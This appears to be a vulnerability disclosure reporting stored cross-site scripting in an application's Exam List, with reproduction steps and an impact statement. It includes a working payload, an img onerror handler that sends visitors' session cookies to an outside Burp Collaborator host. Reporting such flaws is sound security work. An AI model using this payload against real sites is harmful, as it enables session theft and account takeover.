Affected Component
Description
Stored Cross Site Scripting (XSS) via the Exam List
Steps to reproduce
Navigate to Exam List and Click "Create New"
Paste the below payload on Title and Description fields and click save
<img src=x onerror=(window.location='[https://o1q2amfm97kh8cn0zmbc0qi9k0qqef.burpcollaborator.net/?'+document.cookie](https://o1q2amfm97kh8cn0zmbc0qi9k0qqef.burpcollaborator.net/?%27+document.cookie))>
Payload will trigger when a user visits on Exam List
Impact
Attackers can masquerade as authorized users via session cookies, allowing them to perform any action allowed by the user account.